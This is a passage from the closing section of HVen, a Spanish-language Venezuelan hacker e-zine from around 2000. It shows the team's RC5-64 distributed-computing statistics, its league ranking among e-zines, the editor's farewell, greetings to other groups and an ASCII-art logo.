  direccion  de correo  electronico  y  tu  password.  De  dicha  manera
  perteneceras a  nuestro  team RC5-64 y tus bloques seran contados para
  HVen. Hasta el 6 de Agosto las estadisticas del Team van asi:
  

Lugar Participante                  1er Bloque   Ult Bloque     Total     % 

1     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
     7-Dic-1999   5-Ago-2000    133,762  25.78
2     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
                22-Ene-1999   5-Ago-2000    103,579  19.96 
3     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
       5-Jun-1999   1-Ago-2000     86,080  16.59 
4     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
        18-Ene-1999  23-Jul-2000     45,143   8.70 
5     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
         10-Jun-1999  22-Mar-2000     39,506   7.61 
6     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
                25-May-1999   4-Ago-2000     15,324   2.95 
7     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
         15-Dic-1998   3-Ago-2000     14,562   2.81 
8     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
    26-Abr-1999   3-Feb-2000     12,167   2.34 
9     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
           21-Ene-2000   6-Mar-2000      6,939   1.34 
10    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
             5-Oct-1999  14-Abr-2000      6,541   1.26 
11    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
          28-Jun-1999  29-Jul-2000      6,336   1.22 
12    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
         7-Jun-1999   9-Dic-1999      5,375   1.04 
13    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
            26-Abr-1999  29-May-1999      5,164   1.00 
14    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
            19-Ene-1999   7-Nov-1999      4,756   0.92 
15    TecDATA                      10-Sep-1999  10-Nov-1999      4,316   0.83 
16    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
              2-May-1999  30-Ago-1999      3,848   0.74 
17    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
        26-Abr-1999  20-May-1999      3,475   0.67 
18    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
            31-May-1999  14-Abr-2000      3,218   0.62 
19    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
              2-Jun-1999   1-Ago-2000      2,605   0.50 
20    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
         12-Jun-1999   9-Jul-1999      2,597   0.50 
21    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
        24-Ene-1999   4-May-1999      2,526   0.49 
22    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
      16-Ene-2000  12-Mar-2000      1,957   0.38 
23    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
              21-Nov-1999   4-Ago-2000      1,837   0.35 
24    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
              22-Ene-1999  21-May-1999      1,799   0.35 
25    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
      29-Jun-1999  30-Sep-1999      1,704   0.33 
26    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
            2-Feb-2000  24-Feb-2000      1,167   0.22 
27    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
            4-May-1999  15-May-1999      1,151   0.22 
28    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
               18-Jul-1999  16-Ago-1999        884   0.17 
29    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
           6-Jun-1999  16-Jul-1999        499   0.10 
30    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
          18-Jun-1999   9-Jul-1999        102   0.02 

  Vaya ... hay  mucha  gente  que  dejo  de  enviar  bloques hace  mucho
  tiempo =(. Pero con tu ayuda podemos salir adelante.
  
    Liga de E-Zines en Castellano
    
  HVen  pertenece  a  la  liga  de  E-Zines  en  castellano, la  cual va
  encabezada por la gente de SET (http://www.set-ezine.org), actualmente
  hemos  logrado subir una posicion, cosa que gracias al apoyo de muchas
  personas  que  han  entrado  en   el  team  hemos  logrado.  Pero  aun
  necesitamos  tu apoyo para seguir  subiendo. Esperamos  que  te unas a
  nuestro equipo.
  
  Hasta ahora las estadisticas van asi:
  
Pos  Equipo                        Desde
 1   SET ezine RC5-64 Team        04-11-98
 2   J.J.F. / Hackers Team        01-10-98
 3   Proyecto R RC5 Team          15-12-98
 4   HVEN (Hackers Venezuela)     15-12-98
 5   NetSearch RC5-64 Team        29-12-98
 

   ͻ
͹ Despedida ͹Combel
   ͼ

  El   tercer   numero   ha  concluido, cosa  que  por  sobre  todas las
  adversidades  ha logrado  al fin terminarse, y se seguira editando con
  las mismas ganas que ha ido antes.

  Personalmente, este numero me parecio de una gran calidad y exquisitez
  como   nunca   antes  habiamos  logrado,  claro,  todo  gracias  a  la
  invaluable  colaboracion de personas que directa o indirectamente  han
  ayudado y esperemos lo sigan haciendo.

  Les  recordamos   que   la   revista  esta  abierta  a  todo  tipo  de
  colaboraciones  y  comentarios, los  cuales  nos  pueden  enviar  a la
  direccion  E-Mail  <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >.  Si  desean  enviar articulos,
  recomendamos   leer   detenidamente   el   peque~o   aviso  sobre  las
  colaboraciones en este numero publicado.

  Eso  ha  sido todo por esta vez y esperamos verlos de nuevo en nuestro
  proximo numero... que  sin  duda  saldra  con mejor calidad que este y
  todos los  anteriores; solo  es cuestion de esperar a que aparezca. Se
  despide de todos ustedes...

                           <[ HVen Team ]>                            

Saludos a...

Cyber Optik - HackHour                  
kl0nk - 0ri0n Team                      <0ri0n.virtualave.net>
Mr. Silence - SVisor                    
PaTa - RareGaZz                         
TAkER & PlaXiuS - Proyecto R            
Raza Mexicana                           
ThEye & Kasiki - FYE Magazine           
SET                                     
InET                                    
VanHackez                               
[MaU] - Zine Store                      

Y a toda la gente del HVen Team.
KaDiLaC, enan0, HackVenger, ThunderByte, Malkavian, Merlin, J0el_R,
Comisionado, TecDATA (Alive?), Sick Boy, DrAk0 y todos los demas!

ͻ
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
XXXX      X      XXX      XXXXXXXX      XXX          XXX      XXXX      XXXX 
XXXXX    XXX    XXXXX    XXXXXXXXXX    XXXX    XXXXXXXXXX    XXXXXX    XXXXX 
XXXXX    XXX    XXXXXX    XXXXXXXX    XXXXX    XXXXXXXXXX       XXX    XXXXX
XXXXX           XXXXXXX    XXXXXX    XXXXXX        XXXXXX    X   XX    XXXXX 
XXXXX    XXX    XXXXXXXX    XXXX    XXXXXXX    XXXXXXXXXX    XXX      XXXXX 
XXXXX    XXX    XXXXXXXXX    XX    XXXXXXXX    XXXXXXXXXX    XXXXXX    XXXXX 
XXXX      X      XXXXXXXXXX      XXXXXXXXXX          XXX      XXXX      XXXX 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  EZINE  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX * * * * * * * XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
ͼ